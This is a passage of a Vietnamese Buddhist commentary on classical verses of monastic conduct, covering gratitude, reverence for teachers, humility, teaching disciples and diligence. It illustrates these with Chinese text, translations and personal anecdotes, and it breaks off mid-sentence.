Tứ trọng ân chính là: ân Tam bảo, ân cha mẹ, ân quốc gia, ân chúng sinh. Cha mẹ là người sinh ra chúng ta, vỗ về nuôi nấng chúng ta thành người, phải hao tổn biết bao tâm huyết. Tam bảo vun đúc cho chúng ta thân tuệ mệnh, không có Tam bảo thì chúng ta không thể biết được Phật pháp và nếu như thế thì pháp thân tuệ mệnh ấy mãi mãi cũng chẳng thể hiển lộ. Quốc gia là nơi chúng ta nương nhờ, bảo vệ sự sống cho chúng ta. Nếu không có quốc gia thì chúng ta không thể có được chỗ yên bình để học Phật, an tâm để tu hành. Chúng sinh trợ duyên giúp đỡ cho ta tu hành học Phật. Chúng ta không phải lao động sản xuất mà tất cả những nhu cầu trong đời sống đều được tín thí cúng dường. Những ân nặng như thế chúng ta đều phải báo đáp. Một người không có tâm báo ân thì thật đáng thương!
Chúng ta nhớ lại, ở trên nói về bốn ân nặng, nhờ bốn ân mà chúng ta có được nếp sống xuất gia. Trừ những người vô thần luận, tà kiến mới không biết báo đáp bốn ân đức lớn ấy. Chúng ta nên biết, trong tất cả những hành động báo ân, lấy sự thành tâm là bậc nhất. Vì thế Tổ sư dạy: “Thành tâm báo đáp bốn”. Đó chính là nói chỉ cần thành tâm tụng kinh thì có thể báo đáp bốn ân rồi.
“Học thuộc, tụng lời thánh hiền”: tụng kinh và niệm Phật giống nhau. Học thuộc kinh văn thì lúc nào cũng có thể nhớ nghĩ đến kinh văn, không niệm mà niệm, luôn luôn niệm. Kinh văn có thể ghi nhớ trong lòng thì có thể không cần tác ý mà theo miệng tụng niệm.
“Công đức bằng tụng đại tạng”: chỉ cần có thể thành tâm đọc một chữ trong kinh thì giống như đọc trọn bộ đại tạng kinh; công đức không thể nghĩ bàn. Nếu tụng kinh không thành tâm thì tụng nguyên cả bộ đại tạng cũng không có công đức. Vì thế, người xuất gia chúng ta phải tranh thủ thời gian, thành tâm đọc tụng kinh điển, để tăng trưởng trí tuệ, báo đáp bốn ân.
- Hạnh kính sư trưởng
Chữ hán:
出家要敬師長
隨力隨時供養
百孝不如一順
不可回頭倔強
Phiên âm:
Xuất gia yếu kính sư trưởng
Tùy lực tùy thời cúng dường
Bách hiếu bất như nhất thuận
Bất khả hồi đầu quật cưỡng.
Dịch nghĩa:
Xuất gia phải kính sư trưởng
Tùy lúc, tùy sức cúng dường
Trăm hiếu không bằng một thuận
Không được ngỗ ngịch chống trái.
Tam bảo là nơi tựa nương của người xuất gia; thiện tri thức, thầy sáng, bạn tốt là mẹ nuôi chúng ta. Vì thế việc cúng dường Tam bảo, tôn kính sư trưởng cần phải hiểu và làm thấu đáo, cũng chỉ như thế mới có thể khiến cho học nghiệp và đạo nghiệp thành tựu một cách thuận lợi. Sư trưởng chúng ta lao nhọc dạy dỗ, từ một chữ, một câu, một thiên văn chương, cho đến một mảng lí luận đều hi vọng học trò của mình có thể hiểu thông suốt. Chưa có vị Sư trưởng nào giữ lại kiến thức mà không chịu truyền đạt cho học trò. Sư trưởng luôn hi vọng học trò có thể thành công, học tốt, thành người xuất chúng để gánh vác sự nghiệp của Như Lai. Sự lo lắng kì vọng đó không khác gì cha mẹ yêu thương hi vọng con cái của mình. Cho nên, cung kính Sư trưởng cũng là việc hợp với lí của đất trời.
Có đôi lúc sư trưởng dạy học trò hơi nghiêm khắc, nhưng đó là phương tiện để phát khởi sự nổ lực của học trò. Bất luận Sư trưởng dùng biện pháp gì, chúng ta phải tin tưởng tuyệt đối là không phải từ động cơ ác ý, mà là sự rất mực yêu thương. Điều này gọi là “Thương càng nhiều, răn càng lắm[9]”. Đợi đến sau này quí vị cũng sẽ làm thầy thì sẽ thấu hiểu được tầng đạo lí này. Lúc đó quí vị sẽ gặp việc học sinh không chịu nghe giảng, cho đến có những biểu hiện chống đối, trong lòng quí vị lúc ấy như thế nào? Ngay lúc đó quí vị mới thể hội được.
Sư trưởng xưa nay không bao giờ tính toán với học trò, tuy có lúc gặp những học trò vô lễ, sư trưởng không những không để lòng mà còn không quản mệt nhọc, ân cần khéo dẫn dụ, tiếp tục giáo dục, hi vọng với tâm thương yêu, tâm từ bi học trò có thể thành công. Điều đó thật làm cho chúng ta kính ngưỡng.
Trách nhiệm của sư trưởng là truyền đạo, giáo dục và giải quyết nghi ngờ; khai mở văn hóa nhân loại, giữ gìn truyền thống văn hóa dân tộc. Vì thế, một người thành công được đặt nền tảng từ sự giáo dục của Sư trưởng. Một đời Sư trưởng tận tâm, tận lực giáo dục, nên “cung kính Sư trưởng” là một vấn đề rất được coi trọng. Hơn thế nữa, người xuất gia càng phải cung kính Sư trưởng. Chúng ta không chỉ học ở Sư trưởng về học thức thông thường mà còn cầu được trí xuất thế để nuôi sống pháp thân tuệ mệnh
Những ân huệ ấy so với ân thầy thế tục còn cao hơn một tầng, nặng vô cùng. Vì thế nói: ‘Có tôn sư mới trọng đạo’. Tôi từ khi lo việc dạy học đến nay, một mực cổ vũ, khuyến khích học sinh không chỉ cung kính giáo thọ sư ở trường mà đồng thời cũng phải cung kính thầy Bổn sư thế độ. Thời nay, Phật giáo chúng ta phát sinh một hiện tượng xấu: Đệ tử xuất gia sau khi đã học mấy năm ở trường Phật học thường chẳng chịu về với thầy tổ, thậm chí chẳng chịu nghe lời dạy bảo của thầy Bổn sư. Có lúc thầy Bổn sư dạy mấy câu, họ không những không lắng lòng tiếp nhận mà còn giận dỗi thầy rồi bỏ đi, không một mảy may nhớ đến ân thế độ.
Đó có thể nói là hiện tượng rất đáng thương trong nhà Phật. Sư đạo không tồn tại, Tăng đoàn càng không có hi vọng phát triển. Có trường hợp sư trưởng cũng không có khả năng dạy học trò, nhưng làm đệ tử cần hiểu sự tôn nghiêm của sư đạo, nên biết thầy thế độ giống như cha mẹ sinh ta. Nếu thầy không thế độ cho ta thì ta không thể bỏ tục xuất gia. Tục ngữ có câu: “Con chẳng ghét mẹ xấu, chó chẳng chê nhà nghèo”. Chó rất trung thành với chủ, tuyệt đối không vì nhà chủ tranh lá đơn sơ mà nó đi tìm nhà cao cửa rộng; chúng ta là người đệ tử, tuyệt đối chẳng nên vì sư trưởng không có trình độ, không có tiền mà vong ân phụ nghĩa, bỏ thầy mà đi.
Từ năm đầu Dân quốc đến nay, Phật giáo Trung Quốc đã tạm cứu vãn được thế suy đồi, Thái Hư đại sư đã đưa Phật giáo sang một thế vận mới. Đương thời, ngài không chỉ được giới Phật giáo khắp nơi tôn trọng mà cả chính quyền cũng rất kính trọng, bởi trình độ học vấn và đạo lực của ngài rất sâu. Đối với quốc tế, ngài là bậc đạo cao đức trọng, nhưng ngài rất cung kính sư trưởng. Sau khi kháng chiến thắng lợi, ngài theo chính phủ về đến Nam Kinh, vạch xong kế hoạch cho tình hình Phật giáo sắp tới, ngài lập tức trở về quê hương đến thăm sư phụ của mình
Ngài xuất gia ở ngôi chùa lớn hay nhỏ? Pháp hiệu của sư phụ ngài là gì? Cũng chẳng ai hay biết, nhưng chuyện ngài trở về thăm sư phụ là thật, tạp chí Phật giáo đương thời có đăng bài này. Một ngôi chùa nhỏ không tên, một vị tăng chẳng chút tiếng tăm vì sao lại có được một đệ tử pháp sư tôn kính như thế? Hiển nhiên vị đại pháp sư ấy đã tiếp nhận giáo dục truyền thống, lưu lại cho người đời sau một tấm gương tôn sư trọng đạo sáng ngời. Việc làm đó cũng xuất phát từ tấm lòng chân thật, từ sự tu dưỡng cao độ của ngài mà biểu hiện là sự tôn kính sư trưởng.
Vì thế, trên lí luận mà nói, chúng ta nên cúng dường sư trưởng; trên phương diện tình cảm mà nói chúng ta càng chẳng nên lìa bỏ sư trưởng. Giả sử quí vị là thầy, khổ nhọc lắm mới độ được một người đệ tử, sau vài ba lời, nó liền bỏ quí vị mà đi. Lúc đó trong lòng quí vị cảm nhận như thế nào? Chẳng khó tưởng tượng! Vì thế chúng ta cần phải ghi nhớ lời dạy tôn kính sư trưởng của người xưa.
“Tùy lúc, tùy sức cúng dường”: cúng dường sư trưởng bằng sự tu học thành công của chúng ta. Lúc không có khả năng, chỉ cần nổ lực để tiến bộ, y giáo phụng hành là được. Đợi lúc học đã thành, năng lực đã có bấy giờ tùy thời, tùy lúc cúng dường sư trưởng. Đó chính là sự cung kính, và cũng là biểu hiện không quên ân thầy.
“Tùy lực” là tùy khả năng của mình để thể hiện tấm lòng, chứ không nhất định là nhiều ít. “Tùy thời”: là chọn lựa thời cơ thích hợp, hoặc là xét lúc sư trưởng cần để cúng dường. Một vị pháp sư ở gần Hồng Công chuyển đến cho tôi một tin: “Tôi nhớ đến vị thầy giám học ở Phật học viện, đức hiệu là Cam Tuyền, ngài đã hơn bảy mươi tuổi, hiện còn khỏe mạnh ở tại Thượng Hải”. Sau khi tôi nhận được tin này, tôi đặc biệt nhờ vị pháp sư ấy thay tôi mang 350 dollar Hồng Kông cúng dường vị giám học ấy. Bao nhiêu năm như thế, chúng tôi không có liên lạc, không biết ngài như thế nào, một hôm khi biết được tin tức, thì vui mừng vô cùng, viết một phong thư, kèm theo một ít tiền nhằm biểu thị sự nhớ tưởng và báo đáp ân sư. Đáng tiếc là chúng tôi không thể họp lại một chỗ mà chỉ thông qua tin tức, nhưng tâm lí cũng được an ủi. Đó cũng tạm gọi là tùy lực, tùy thời cúng dường!
“Trăm hiếu không bằng một thuận”: Đối với cha mẹ sư trưởng, xưa nay Trung Quốc giảng về hiếu thuận như thế này: Hiếu là học theo đức hạnh của người, thuận là vâng theo sự dạy bảo của người. Nhưng hiếu không bằng thuận, thuận là vâng lời, đúng phải vâng lời mà sai cũng phải vâng lời. Đối với những lời dạy bảo của cha mẹ, sư trưởng mà có ý chống trái tức là biểu hiện không cung kính, là hành vi vô lễ, nên nói: ‘Trăm hiếu không bằng một thuận’.
“Không được quay đầu chống trái”: Lúc đệ tử đang ở với sư trưởng thì tỏ vẻ cung kính, nhưng khi đã rời thầy thì những lời thầy dạy đều quên sạch, thậm chí đối với những sự dạy bảo hướng dẫn của sư trưởng không những không tiếp nhận mà còn phản kháng. Đó đều là những việc chẳng nên làm, cũng là biểu hiện của sự không hiếu thuận, phản lại với đạo lí làm người, làm đệ tử. Tổ sư giảng vài lời như thế nhưng dụng ý vô cùng sâu xa. Vì thế cần phải duy trì sư đạo, đó chính là kéo dài mạng mạch Phật pháp. Chúng ta còn là Tăng sinh cần phải nhận chân được điều này để thực hành.
- Hạnh thành tâm học hỏi
Chữ hán:
出家要學老誠
第一不可誇能,
猖狂硬氣粗疎,
神人一見生瞋。
Phiên âm:
Xuất gia yếu học lão thành
Đệ nhất bất khả khoa năng
Xương cuồng ngạnh khí thô sơ
Thần nhân nhất kiến sinh sân.
Dịch nghĩa:
Xuất gia học phải tâm thành
Hãy nhớ, đừng khoe tài năng
Tùy tiện, ngang ngạnh, thô lỗ
Thần nhân vừa thấy sinh sân.
Điều kiện cơ bản để làm người là phải chân chính, thành thật, không giả dối. Một người thành thật, thì họ không bao giờ dối trá, mà kín đáo khiêm nhường. Vì thế ở hạnh thứ tám tổ sư nói: “Xuất gia yếu học lão thành”. Cũng chính là dạy chúng ta điều kiện cơ bản để làm người. Một người giả dối, dựa vào một chút thông minh mà tự cao tự đại, cho mình là hơn hết. Hạng người như thế, không những không nhận được sự hoan nghinh của người khác mà thậm chí thiên thần, địa thần, hộ pháp đều chán ghét xa lìa.
Vì thế, làm người không được khoe mình tài giỏi. Ngược lại, một người có đức khiêm cung, mới có thể cùng ở với người khác, mới có cơ hội học hỏi những điều hay của người. Chúng ta thường thấy, người tự mãn tự đại làm cho người khác lánh xa, xấu hổ không muốn gần, nên cổ nhân có câu: “Mãn chiêu tổn”, nghĩa là người tự mãn tự đại thì bị thiệt thòi bởi không bao giờ được người khác quan hệ và thân cận, lại không học được đạo lí làm người. Một người sống trong xã hội không thể là vạn năng, huống là thế giới tri thức đổi mới hằng ngày hằng tháng, lúc nào cũng có thể gặp trường hợp mà mình chưa từng thấy nghe, điều mà mình không có cách nào thấu hiểu được. Vì thế, thời thời khắc khắc cần phải khiêm cung học hỏi mới là bí quyết hàng đầu của sự thành công.
Khổng Tử sở dĩ được tôn xưng thánh nhân chính vì ngài là người có tinh thần “giáo bất quyện, học bất yếm” (dạy người không mỏi, học hỏi không chán). Khi mới vào Thái miếu, mỗi một việc không rõ, ngài đều phải hỏi cho rõ, khi không hiểu liền hỏi. Ngài cũng không xấu hổ và cũng chẳng cho rằng hỏi người ở dưới là làm mất đi thân phận của mình. Nếu là người tự thị cống cao thì họ cho rằng hỏi người dưới cảm thấy xấu hổ, vì thế mà họ cam chịu không hiểu. Và cũng không dám hỏi mọi người vì như thế là tự vạch sự khiếm khuyết của mình. Cổ nhân rất coi trọng: “Không xấu hổ khi hỏi người nhỏ hơn mình[10]”. Tục ngữ có câu: “Sống đến già, học đến già[11]”
Việc gì mình không hiểu, về sau nên hỏi người khác để rõ và kể từ đó không lặp lại sự xấu hổ vì không hiểu được sự lí của vấn đề ấy. Đã không biết mà lại cho rằng hỏi người khác là xấu hổ nên không chịu hỏi thì đó mới thật là đáng xấu hổ, bởi vì mọi người đều biết, riêng bạn không hay không biết! Đúng là vì sĩ diện mà chịu nhiều thiệt thòi. Vì thế, chúng ta phải tùy thời học tập mới đúng. Chúng ta là người xuất gia, bí quyết hàng đầu trong sự tham học thành công là khiêm cung, thành thật, trăm nghìn vạn lần không được cho là mình đã biết đạo lí ấy, rồi thấy không ai bằng mình, thậm chí không thèm chú ý, không muốn tham vấn mọi người. Đây là điều bất lợi nhất.
Từ đó mà xét, giai đoạn chúng ta tham học, chẳng nên phải lo sợ khó khăn, chỉ cần thành thật, khiêm cung, chịu khó học tập thì nắm chắc thành công. Bởi vì một người chân thành khẩn thiết cho dù đi đến chân trời góc bể nào, ở thế giới này cũng đều được hoan nghinh. Người cống cao tự đại, dù đi đến đâu chắc hẳn bị người chán bỏ. Nên biết một người nào đó cảm thấy mình tài giỏi, thì trên thực tế sẽ phơi bày sự nông cạn, thiếu hiểu biết của họ. Cho nên Tổ sư dạy bảo chúng ta phải khéo học sự thành thật khiêm cung để kiềm chế tính tự cao tự đại, khoa trương tài năng của mình. Không như thế, để tâm cứ mặc tình tự cao tự đại, ương ngạnh thô tháo, khinh người ngạo vật thì đừng nói là người nhìn thấy sẽ sinh sân hận mà thần thánh thấy người ấy cũng sinh chán ghét.
Trong tạng Luật có nói: Sau khi chúng ta học Phật, qui y Tam bảo thì được ba mươi sáu điều hộ trì của thần hộ pháp. Sau khi thụ giới, thì cứ thụ mỗi giới sẽ có năm vị thần hộ pháp đi theo để hộ vệ. Vì thế, ở bất kì cảnh nào, gặp phải bất lợi, phải chịu nhục thế nào đi nữa, nhưng đối với chúng ta sẽ không có tổn hại, bởi thần hộ pháp thấy chúng ta một cách rõ ràng, và luôn hộ trì chúng ta. Tục ngữ có câu: “Bất lợi chính là lợi thế[12]”. Chúng ta có thể nói lại: Một người không khoe khoan tài năng, không giận dữ, cũng không thô tháo, cố nhiên là người có đức tính tốt, nhưng nhu nhược thái quá cũng không nên. Nhu nhược thái quá khi gặp bất cứ việc gì chính mình cũng không tự đảm đương giải quyết thì không tốt. Vì thế, tôi nghĩ rằng làm người phải ‘ngoại viên nội phương’ có khí khái của bậc đại trượng phu mới có thể gánh vác việc lớn. Chúng ta xuất gia hiện tướng trượng phu, thụ giới Bồ-tát thì chính là Bồ-tát. Trượng phu là người đầu đội trời, chân đạp đất, không nên có dáng ẻo lả, đứng không ra đứng, cần phải có chí hướng của người nam tử.
Trong lịch sử quá khứ có rất nhiều Tì-kheo ni, người thiện nữ, học Phật ngộ đạo không kém người nam. Vì vậy, nếu biểu lộ quá nhu nhược, việc gì cũng nhờ người giúp đỡ thì không thể tự lập, thậm chí hình thành thói quen ỷ lại, không thể tự mình làm chủ; như thế còn nói gì đến gánh vác sự nghiệp của Như Lai? Trong tăng đoàn sống trong lục hòa nhưng tinh thần cơ bản vẫn là tự mình lo cho mình. Tự mình lo cho mình tốt, sau đó mới có thể lo cho người khác. Quan tâm đến người khác là rất tốt nhưng không nên hi vọng người khác quan tâm lại mình. Người nhu nhược tự nghĩ: “Nếu người khác không quan tâm đến tôi, không lo cho tôi thì tôi cảm thấy buồn tủi, mặc cảm với mọi người”. Sự biểu hiện không chính đáng như vậy, không những làm cho người khác chán ghét mà chính mình không biểu hiện được sự khí khái. Như thế là không tốt.
Làm người cần phải trung đạo, kiêu ngạo cố nhiên là không tốt, nhưng quá nhu nhược lại không nên. Làm người cơ bản cần phải đủ ‘ngoại viên nội phương’, tự mình có nguyên tắc của mình, bên ngoài đối với người khác đều có thể rất lịch sự, tôn trọng khiêm cung nhưng phải giữ vững lập trường trong lòng của mình. Điều đó được gọi là ‘không tự ti cũng không tự cao’. Như thế bất cứ trường hợp nào, nói bất cứ điều gì mới không bị người khác khinh khi. Mặt khác, chúng ta có thể đưa ra một vài câu để cải chính quan điểm sai lầm của họ đối với mình mà lại không làm thương tổn sự tôn nghiêm của người khác. Điều này trọng yếu, cần phải vận dụng thích hợp trong từng hoàn cảnh, và phải tự thiết lập sự tôn nghiêm của mình.
Năm ngoái, tôi dẫn đoàn đại biểu tôn giáo Trung Quốc của hiệp hội Á châu tiếp tiên sinh Tân Cách hiệu trưởng trường New Delhi ở Ấn Độ. Nhân vì chúng tôi chưa từng gặp mặt và vị này cũng chính là khách từ xa đến của chúng tôi, cố nhiên chẳng quen biết và với hoàn cảnh Đài Loan ông ta lại càng chẳng hề hay biết. Trong lúc đàm thoại, ông ta hỏi:
– Dân số Đài Loan nhiều ít?
Tôi đáp:
– Một nghìn tám trăm vạn dân.
Nghe xong ông nói với vẻ khinh thị:
– Ở New Delhi chúng tôi có bảy trăm vạn dân ở thành thị.
Trong lòng ông ta như muốn nói: “Quí vị với số người như thế làm sao làm được việc lớn? Trong lời nói của ông ta có ý khinh thị chúng tôi. Lúc ấy, tôi liền đính chính ông ta, tôi nói: “Đài Loan chúng tôi tuy chỉ có một nghìn tám trăm vạn dân, nhưng lại không có một người nào thất nghiệp, không có một người nào là không có việc làm, không có một người nào là nằm ngủ dưới gốc cây”. Bởi chúng tôi biết được ở New Delhi khắp nơi đều có người nhàn hạ ngủ dưới gốc cây. Câu nói này của tôi đã làm thay đổi quan niệm của hiệu trưởng Tân Cách, ông liền cười chữa thẹn. Vì thế chúng ta cần phải học tập kỹ năng phát ngôn không mang thái độ kiêu ngạo, cũng không tự ti để sửa đổi quan niệm nhầm lẫn của người khác đối với chúng ta.
Nếu không tu dưỡng khả năng này thì bị người xem thường, đó là một điều không tốt, là một điều đáng xấu hổ.
Nói tóm lại, thái độ cơ bản để làm người tất nhiên là không nên cao ngạo nhưng cũng chẳng nên quá nhu nhược, giữ lấy thái độ và phương pháp chân thành trung thực, để ứng phó giao tiếp với người thì không chỉ ở đâu đều được mọi người hoan nghinh mà đó cũng là bí quyết làm người thành công.
- Hạnh dạy bảo đệ tử.
Hán văn:
出家要教徒弟
不可隨他遊戲
諄諄教養成人
好作佛門大器
Phiên âm
Xuất gia yếu giáo đồ đệ
Bất khả tùy tha du hí
Truân truân giáo dưỡng thành nhân
Hảo tác Phật môn đại khí.
Dịch nghĩa
Xuất gia phải dạy đệ tử
Chẳng nên cùng chung vui đùa
Ân cần dạy bảo nên người
Thành bậc pháp khí thiền môn.
Đệ tử là những người sau chúng ta một đời, cũng chính là truyền nhân của Phật pháp sau này. Làm sư trưởng hẳn nhiên phải độ đệ tử, nhưng phải có trách nhiệm giáo dưỡng, khiến cho những đệ tử của mình thành bậc pháp khí trong nhà Phật. Vì thế, Tổ sư đem hạnh giáo dưỡng đệ tử đặt ở hạnh thứ chín của người xuất gia.
Tam tự kinh nói: “Nuôi con chẳng dạy con là lỗi của cha; dạy học trò mà không nghiêm là lỗi của thầy[13]”. Người thế tục đã sớm biết việc cần phải giáo và dưỡng đệ tử. Nếu dưỡng mà không giáo là lỗi của cha mẹ, làm cha mẹ nếu không nuôi dạy tốt con của mình, để nó trở thành phần tử bất hảo trong xã hội thì xã hội sẽ phải chịu những tai họa từ những đứa con như thế. Vì thế, giáo dục gia đình rất trọng yếu, cha mẹ đối với tất cả những sinh hoạt của con mình, nhất cử nhất động đều phải dạy bảo. Chúng ta xem những biểu hiện của đứa bé thì có thể biết được sự giáo dục của gia đình đó chu đáo hay sơ sài.
Người Trung Quốc nghiên cứu và áp dụng “Thi lễ truyền gia[14]”, tuy ngày xưa là xã hội nông nghiệp nhưng cũng vô cùng chú trọng giáo dục cho thế hệ mai sau. Tứ thư Ngũ kinh nói về lễ, tất cả những tiêu chuẩn làm người, tất cả đạo đức trong xã hội, đạo lí nhân luân. Lễ Kí lại giảng về chế độ, trật tự xã hội, chẳng hạn như dạy về thứ tự người lớn và trẻ em, sự khác nhau giữa người sang kẻ hèn…
Về phương diện giáo dục ở trường, thầy giáo phải dạy hết trách nhiệm của mình, không thế thì được gọi là: “Dạy học trò mà không nghiêm là lỗi của thầy”, tức dẫn đệ tử đi vào con đường lầm lạc. Con người nhất định phải trải qua giáo dục mới có thể thành người, đương nhiên trí năng của con người có thông minh, có ngu đần, nhưng người làm thầy, phải khéo gia tâm dạy bảo, chớ cho rằng chỉ số thông minh quá thấp, không có triển vọng thì bỏ không dạy.
Hiện nay, thông thường ở các trường có sự phân loại giáo dục, gọi là chia lớp để dạy. Nghĩa là xếp những học sinh có chỉ số thông minh thấp thành một lớp hỗn tạp, kết quả hình thành hàng nghìn hàng vạn thanh thiếu niên bụi đời. Đó là sự thất bại lớn của nền giáo dục quốc dân. May mắn thay, như lời Bộ trưởng giáo dục nói sẽ thay đổi chế độ này.
Xưa, Khổng Tử nhấn mạnh “Hữu giáo vô loại[15]”. Kẻ thượng căn lợi trí cố nhiên phải giáo dục, hạng độn căn ngu si cũng không thể không giáo dục. Có như thế mới hết được trách nhiệm giáo dục.
Sự giáo dục Đức Phật rất bình đẳng, ngay cả ngu đặc như Châu-lợi Bàn-già-đà. Trình độ của tôn giả này không nhớ nổi hai chữ ‘chổi quét’, đọc ‘chổi’ thì quên ‘quét’ nhưng Đức Phật còn nhẫn nại hướng dẫn ông ta đến khai ngộ chứng A-la-hán. Do đó, có thể biết, dạy không thấu đáo thì người thầy khó tránh khỏi lỗi biếng nhác, hoàn toàn chẳng phải là vấn đề học sinh có thể thành hay không thể thành người, mà là phương pháp dạy có vấn đề, không bỏ công sức một cách chân thực.
Chúng ta là người xuất gia cần phải lưu truyền Phật pháp từ đời này sang đời khác, đừng để chỉ có một đời rồi kết thúc. Sư tổ cao cao tằng của tôi là Lão Hòa thượng thượng Ngọc hạ Thành, rất chú trọng vấn đề giáo dục. Thông thường, các chùa ở quê nhà chúng tôi đều rất chú trọng đến việc tăng gia tài sản, những chùa giàu, có thể có một nghìn hoặc hai nghìn mẫu đất. Vì thụ hưởng nếp sinh hoạt địa chủ nên con cháu không tham gia giáo dục phổ thông, và đều không thể thành tài. Ngọc thái lão nhân lại không làm như thế, ngài trụ trì chùa Hoằng Khai, chỉ còn lại hơn trăm mẫu đất, cũng chỉ đủ duy trì sự sinh hoạt chúng Thường trụ. Giả như có dư nhiều tiền của, thì ngài đem sửa những chùa miếu bị hư quanh vùng.
Chùa Hoằng Khai con cháu bảy đời đồng đường hơn năm mươi người. Năm Ngọc thái lão nhân hơn tám mươi tuổi, lúc sắp viên tịch ngài biết trước hai tháng nên đã viết thư mời những vị trụ trì ở các địa phương, trụ trì chùa Hoằng Khai, những vị giáo thụ và các con cháu đang học ở các nơi tề tựu rồi ước định kì hạn để niệm Phật, mỗi người sáu cây hương. Đến khi niệm được bốn mươi tám ngày thì ngài thấy có chút bệnh, lên giường nằm nghỉ. Ngày thứ bốn mươi chín, lúc mười giờ trưa ngài nói kệ rồi tịch. Đó là do ngài dùng tâm nhân từ tu trì mà thành tựu. Lúc còn sống, sáng sớm ngài thường quì tụng bốn mươi chín biến chú đại bi không hề gián đoạn, nhân đó mà ảnh hưởng đến rất nhiều thanh niên ở quê nhà xuất gia tinh tiến tu học.
Sở dĩ tôi được xuất gia học đạo cũng do lòng từ chiếu cố của ngài. Ngài thường khích lệ những người du học, tôi là cháu đời thứ sáu của ngài. Gặp kì học viện nghỉ, chúng tôi trở về đảnh lễ ngài, ngài bảo nhà bếp thêm thức ăn cho chúng tôi. Đến khi đi học lại, ngài luôn cho tiền xe và tiền tiêu. Với sự động viên như thế khiến cho chúng tôi không những không thể quên mà còn càng thêm cảm ân, tinh tiến. Cho nên có thể nói rằng Ngọc Thái lão nhân thật là một vị điển hình cho sự chú trọng giáo dục con cháu.
- Hạnh không biếng nhác
Chữ hán:
出家要除懶惰,
凡事向前去做。
你若避懶偷安,
人神那得衛護。
Phiên âm
Xuất gia yếu trừ lại nọa
Phàm sự hướng tiền khứ tố
Nễ nhược lại nọa thâu an
Nhân thần na đắc vệ hộ.
Dịch nghĩa:
Xuất gia phải bỏ lười biếng
Làm việc nhiệt tình siêng năng
Nếu người trốn tránh, thích nhàn
Chẳng được người, thần hộ vệ.
Thích nhàn hạ ghét nhọc nhằn vất vả là bẩm tính của con người, nhưng từ xưa đến nay, những người thành công đều do siêng năng mà chưa từng nghe ai nói biếng nhác có thể thành công. Vì thế, Tổ sư muốn chúng ta trừ bỏ thói lười biếng, tinh tiến không giải đãi thì thần và người đều có thể giúp ta thành công.
Biếng nhác là mặt đối lập với chuyên cần. ‘Cần’ là yếu tố quan trọng thứ nhất để đi đến thành công. Trong đường đời, con người khó tránh khỏi những hoạn nạn cần phải khắc phục. Một vài hoạn nạn ấy hình thành nên chướng ngại mà cần phải dùng sự chuyên cần để giải quyết. Tục ngữ có câu: “Nhất cần thiên hạ vô nan sự[16]”, lại nói: “Cần năng bổ chuyết[17] ”, thật là những danh ngôn vô cùng chí lí.
Có một vài người chỉ số thông minh (IQ-intelligence quotient) hơi thấp nhưng họ chịu khó hạ thủ công phu, chuyên cần học hành luyện tập, thì một ngày nào đó họ sẽ đạt đến mục tiêu của sự thành công. Khổng Tử nói: “Nhân nhất năng chi, kỷ thập chi; nhân thập năng chi, kỷ bách chi[18]”, người có thể nổ lực như thế thì không có việc gì mà không thành công.
Có những người thông minh hơn, dạy qua một lần là có thể hiểu nhưng nếu là người ngu thì cũng không phải hết cách, chỉ cần người đó chịu học, thầy giáo dạy họ một trăm lần, một nghìn lần cũng không lấy làm phiền chán. ‘Cần’có thể khiến cho người khác vui mừng, kéo dài tuổi thọ. Trong xã hội, cần chính là yếu tố khiến cho con người sống lâu trăm tuổi. Mỗi năm đến tiết Trùng Dương, các cụ nhận bằng tuyên dương thọ lão, khi hỏi các cụ về đạo dưỡng sinh đa phần các cụ đều nói do thói quen thích vận động, làm việc vui vẻ. Đặc biệt những người cao tuổi ở nông thôn, chuyên cần làm việc nên đều sống lâu. Gần đây, ở Pakistan có một vị thọ 130 tuổi kết hôn với một bà cụ 127 tuổi. 130 tuổi còn có thể kết hôn, người ấy thân thể hẳn phải rất khỏe mạnh. Lúc ấy, ông được phỏng vấn về bí quyết dưỡng sinh, ông nói: “Không có gì đặc biệt, chỉ là không hút thuốc, không uống rượu, và một bí quyết nữa là chăm làm, làm việc một cách vui vẻ”.
Có thể thấy chuyên cần thích hoạt động đúng thật là yếu tố trợ giúp cho thân thể khỏe mạnh. Ngược lại, biếng nhác khiến cho con người dễ suy lão, thiếu sức sống. Người nào có thể luôn chú ý đến hoàn cảnh sinh hoạt của mình, tập thành thói quen sạch sẽ, gọn gàng, không những không xả bừa bãi mà còn có ý thức vệ sinh. Những công tác nhỏ nhặt ấy nhưng có thể trang nghiêm môi trường sinh hoạt của mình. Không nên sợ làm việc, lúc cử động chân tay là làm lợi cho thân tâm; nếu việc gì mình cũng không làm, để người khác làm thay, thì mất đi nhân duyên gieo trồng phúc đức của mình.
Trong sử Phật giáo Trung Quốc có vị cư sĩ tên Viên Liễu Phàm, vốn là người thọ mạng ngắn, lại không có con. Sau nghe lời thiền sư Vân Cốc, ông tích phúc tu đức, thế rồi không những ông trường thọ mà còn sinh được hai người con đều có công danh. Làm việc tốt không ở chỗ việc lớn nhỏ, như thuận tay nhặt ngói, đá, hay vỏ chuối trên đường… việc làm ấy tuy nhỏ, nhưng làm với tâm thiện nên công đức rất lớn.
Có câu: “Người tốt không bị bỏ rơi[19]”, bỏ tính biến nhác, xông xáo làm việc tốt thì luôn có kết quả tốt. Người trốn tránh công việc, thích nhàn hạ không chỉ làm cho người khác chán ghét mà ngay cả thiên thần cũng chẳng ủng hộ.
Trước đây, các tự viện ở Trung Quốc có thói quen cúng dường thức ăn cho người xuất gia vào giờ ngọ, có một tăng sĩ tính lười biếng thường đến một ngôi chùa lớn để ăn cơm, sau khi ăn xong lại đi, không chịu phụ việc giúp chúng tăng thường trụ. Lâu ngày như thế, một hôm vị tăng hành đường muốn chỉnh tật xấu này của vị ấy, nên chỉ dọn đủ phần ăn trong chúng khiến cho vị tăng sĩ nhác ấy không thể ăn được. Liên tiếp ba ngày vị ấy không được ăn, nhân đó vị ấy khởi tâm sám hối nghĩ: “Từ trước đến nay ta chưa từng làm việc gì cho chùa, không có tích phúc đức, vì thế nên không được ăn”. Thế rồi vị ấy quyết tâm tìm làm một việc gì đó cho chùa. Ở trước chùa có một khu đất cỏ mọc um tùm, vị ấy bèn dọn phát cỏ vùng đất này làm cho cảnh chùa thêm đẹp. Một hôm, Hòa thượng Phương trượng phát hiện khu đất trước chùa được phát dọn sạch sẽ, đồng thời thấy một vị tăng lạ đang làm việc, Phương trượng bèn đến hỏi thăm. Vị tăng ấy thẹn thùng kể lại nguyên do. Hòa thượng Phương trượng nghe xong, cho vị ấy nhập chúng để theo chúng tu tập. Khi nhập chúng, vị ấy học hành vô cùng nghiêm túc, và sau được Hòa thượng Phương trượng truyền thừa, kế tục nhận chức Phương trượng. Do đó có thể biết: 